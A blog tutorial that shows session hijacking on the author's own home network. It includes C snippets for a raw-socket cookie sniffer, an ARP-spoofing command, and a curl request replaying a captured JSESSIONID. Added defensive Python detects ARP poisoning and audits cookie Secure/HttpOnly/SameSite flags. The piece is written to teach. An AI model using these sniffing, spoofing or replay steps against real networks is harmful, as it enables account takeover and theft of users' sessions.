2025-04-12 Stealing your cookies

Today we will be performing a session hijacking attack by stealing HTTP cookies. Let's get started.

Step 1: Getting the cookies

When performing this attack, the first (and most obvious) thing we need to do is pick a target, intercept their traffic, and parse it for HTTP headers. We can then extract any information we want; in this case, we will take the cookie field.

Today I completed my newest tool, cookiemonSter. This tool will help us extract the cookies and hijack our target’s session.

With some help from this forum post we can make the following regex:

const char *pattern = "([A-Za-z0-9_\\-]+)=((\"[^\"]*\")|[^;\\s]*)";

Now that we have a pattern to match, we need to start monitoring all of the traffic passing through the attacker. To do this we can simply set up a raw packet socket (AF_PACKET), which hands us every frame the interface sees:

sock_raw = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

Start to listen:

while (1) {
    int data_size = recvfrom(sock_raw, buffer, sizeof(buffer), 0, &saddr, &saddr_size);

Create an IP struct to get the source and destination:

struct iphdr *ip = (struct iphdr *)(buffer + sizeof(struct ethhdr));

Then we can actually attempt to parse and print incoming headers with cookies:

if (ip->protocol == IPPROTO_TCP) {
    /* tcp, payload, src and dst are set up earlier in the tool (not shown here):
       tcp points at the TCP header, payload at the data that follows it, and
       src/dst hold the dotted-quad addresses. payload has to be NUL-terminated
       before strstr() is safe to call on it. */
    if (data_size > 2) {
        uint16_t dport = ntohs(tcp->dest);
        switch (dport) {
        case 80:
        case 443:
        case 8080:
        case 8443:
            if (strstr((const char *)payload, "Cookie:")) {
                printf("\n-------------------------------\n\n");
                printf("\n\n\033[1;34m[HTTP]\033[0m \033[1;32m%s\033[0m -> \033[1;31m%s\033[0m | Protocol: \033[1;33m%d\033[0m\n\n ",
                       src, dst, ip->protocol);
                parse_cookies(payload);
            }
            break;
        default:
            break;
        }
    }
}

Note: the source for all of these tools will be out soon in the 1.0 release.

Step 2: The attack

Now that we have a program that can intercept and parse HTTP headers, let's start the attack.

As usual, the victim in this simulation is my phone (10.0.0.155) and my laptop is the attacker (10.0.0.117).

Since almost every network in the world uses modern switches, we will have to perform an ARP spoofing attack to listen to my phone’s TCP communications. We can do this by running my tool, moriarty:

sudo moriarty  10.0.0.1 b8:1f:e1:23:41:ab 10.0.0.155 f0:44:a0:a1:73:63

This command will begin to spam ARP requests from "10.0.0.1" (the gateway's IP) to 10.0.0.123 (my phone).
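From the defender's side, the poisoning in this step shows up in the neighbour table as the gateway's IP suddenly resolving to a different MAC, and as one MAC claiming more than one IP. The Python script below is an added example, not part of the post or of moriarty: it parses "ip neigh show" style lines (constructed here; 00:11:22:33:44:55 is a placeholder for the attacking laptop's MAC, which the post does not give) and compares the gateway entry against the MAC the post shows for 10.0.0.1.

```python
import re
from typing import Dict, List

# The gateway and the MAC it answered with in the post.
TRUSTED_GATEWAYS = {"10.0.0.1": "b8:1f:e1:23:41:ab"}

# Constructed 'ip neigh show' output. 00:11:22:33:44:55 is a placeholder for the
# attacking laptop's MAC, which the post does not give.
NEIGH_CLEAN = """\
10.0.0.1 dev wlan0 lladdr b8:1f:e1:23:41:ab REACHABLE
10.0.0.117 dev wlan0 lladdr 00:11:22:33:44:55 STALE
"""
NEIGH_POISONED = """\
10.0.0.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
10.0.0.117 dev wlan0 lladdr 00:11:22:33:44:55 STALE
"""

# ip, device, MAC, state; entries without an lladdr (FAILED/INCOMPLETE) do not match.
NEIGH_LINE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9A-Fa-f:]{17}) (\S+)$")


def parse_neigh(output: str) -> Dict[str, str]:
    """Map IP -> lowercased MAC from neighbour-table lines; lines without lladdr are skipped."""
    table: Dict[str, str] = {}
    for line in output.splitlines():
        m = NEIGH_LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def check_arp_table(table: Dict[str, str], trusted: Dict[str, str]) -> List[str]:
    """Return one alert string per anomaly; an empty list means nothing suspicious."""
    alerts: List[str] = []
    # 1. A trusted IP answering from a MAC other than the one we recorded.
    for ip, expected in trusted.items():
        seen = table.get(ip)
        if seen is not None and seen != expected:
            alerts.append(f"{ip} resolves to {seen}, expected {expected}")
    # 2. One MAC claiming several IPs, one of them a gateway.
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and any(ip in trusted for ip in ips):
            alerts.append(f"{mac} claims {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for label, sample in (("clean", NEIGH_CLEAN), ("poisoned", NEIGH_POISONED)):
        found = check_arp_table(parse_neigh(sample), TRUSTED_GATEWAYS)
        print(f"{label}: {found or 'no anomalies'}")
```

In practice you would feed the real output of "ip neigh show" to parse_neigh on a timer and record the gateway MAC once, on a network you trust. Static ARP entries for the gateway on the hosts that matter, or dynamic ARP inspection on a managed switch, stop the poisoning rather than just reporting it.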

Once we run this we can run cookiemonSter as well:

sudo cookiemonSter

Now, to make testing this easy, I will navigate to an HTTP site (cookies can sometimes be exposed over HTTPS as well). If our monitor and ARP spoof are working, we should see something like this:

[Image: cookie_mon.jpg, cookiemonSter output]

When a user creates a session, request.getSession() is called; this creates the JSESSIONID cookie, which stores the session identifier. This is how websites identify and remember you; for example, if you are automatically logged in to Amazon every time you open your browser, you probably have one of these session cookies telling Amazon, "Hey, I'm me; you can log me in." Now you might see where this causes issues... I just stole one with about 2 commands and 5 minutes of effort.

All I need to do now is put the JSESSIONID in an HTTP request; for example, I could run something like this:

curl -H "Cookie: JSESSIONID=D159FBE7E9FAD5C4DA9FDB8051AC5E47" http://unsecurewebsite.net/
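The capture above only works because the session cookie was issued without the attributes that stop a browser from sending it over plain HTTP in the first place. As an added example (not code from the post or from cookiemonSter), the Python below parses Set-Cookie headers from a constructed response with the same name=value regex from Step 1 and flags cookies that lack Secure, HttpOnly or SameSite; the cookie values and the session-name heuristic are made-up placeholders.

```python
import re
from typing import Dict, List

# The name=value regex from Step 1, written as a Python raw string.
COOKIE_PAIR = re.compile(r'([A-Za-z0-9_\-]+)=(("[^"]*")|[^;\s]*)')

# Constructed sample response (placeholder values, not from any real site).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: JSESSIONID=EXAMPLE0123456789ABCDEF; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; Max-Age=31536000\r\n"
    "Set-Cookie: __Host-sid=EXAMPLEFEDCBA9876543210; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)

# Name fragments that usually mark a session or credential cookie (heuristic, assumed).
SESSION_HINTS = ("sess", "sid", "auth", "token")


def set_cookie_values(raw_response: str) -> List[str]:
    """Return the value part of every Set-Cookie header in the response head."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[1].strip()
            for line in head.split("\r\n")
            if line.lower().startswith("set-cookie:")]


def parse_set_cookie(header_value: str) -> Dict[str, str]:
    """Split 'name=value; Attr; Attr=val' into a dict; attribute keys are lowercased."""
    parts = [p.strip() for p in header_value.split(";")]
    m = COOKIE_PAIR.match(parts[0])
    if not m:
        raise ValueError(f"malformed cookie pair: {parts[0]!r}")
    cookie = {"name": m.group(1), "value": m.group(2)}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip()
    return cookie


def audit_cookie(cookie: Dict[str, str]) -> List[str]:
    """Findings that would let this cookie leak the way the post describes."""
    findings: List[str] = []
    session_like = any(h in cookie["name"].lower() for h in SESSION_HINTS)
    if "secure" not in cookie:
        findings.append("no Secure flag: browser sends it over plain http://, where a sniffer reads it")
    if session_like and "httponly" not in cookie:
        findings.append("no HttpOnly flag: page script can read the session id")
    if "samesite" not in cookie:
        findings.append("no SameSite attribute: attached to cross-site requests")
    return findings


def audit_response(raw_response: str) -> Dict[str, List[str]]:
    """Map each cookie name set by the response to its list of findings."""
    return {c["name"]: audit_cookie(c)
            for c in map(parse_set_cookie, set_cookie_values(raw_response))}


if __name__ == "__main__":
    for name, findings in audit_response(SAMPLE_RESPONSE).items():
        print(f"{name}: {'; '.join(findings) or 'ok'}")
```

Against the sample, JSESSIONID trips all three checks, theme trips two (it is not session-like, so no HttpOnly finding), and the __Host- cookie passes. The Secure flag is the one that matters for this post: with it set, the browser never puts the cookie on the wire in clear text, so the sniffer from Step 1 has nothing to match.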

Conclusion

Browser cookies are one of the most common targets for stealer malware and they aren’t hard to get. It is very important to be very cautious about which websites you allow cookies on.

I hope this post can help teach others how seemingly innocent features can be exploited and used in malicious ways.